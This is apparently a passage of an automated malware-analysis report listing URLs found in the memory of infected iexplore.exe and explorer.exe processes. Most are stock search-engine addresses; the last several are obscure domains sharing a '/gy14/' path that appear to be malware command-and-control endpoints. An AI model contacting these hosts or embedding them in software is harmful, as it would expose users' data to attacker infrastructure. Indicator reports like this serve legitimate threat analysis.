          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahoo.com/favicon.icodx
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahoo.com/lr
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yam.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search2.estadao.com.br/.
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://service2.bfast.com/r
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/U
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.aol.de/7
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.t-online.de/F
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.web.de/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://suche.web.de/~r
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://udn.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://udn.com/xF
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://uk.ask.com/&
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://video.globo.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://web.ask.com/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.0854n5.shop
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.0854n5.shop/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.0854n5.shop/gy14/www.theanhedonia.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.0854n5.shopReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shop
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shop/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shop/gy14/www.creditspisatylegko.site
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shop/gy14/www.ufocafe.net
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shopReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.169cc.xyz
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.169cc.xyz/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.169cc.xyz/gy14/www.mosaica.online
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.169cc.xyzReferer:
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.247fracing.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.247fracing.com/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.247fracing.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com/gy14/www.camelpmkrf.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com/gy14/www.mtdiyx.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/www.mosaica.online
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/www.smnyg.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/Dr
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/favicon.icoNx
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.com/gy14/
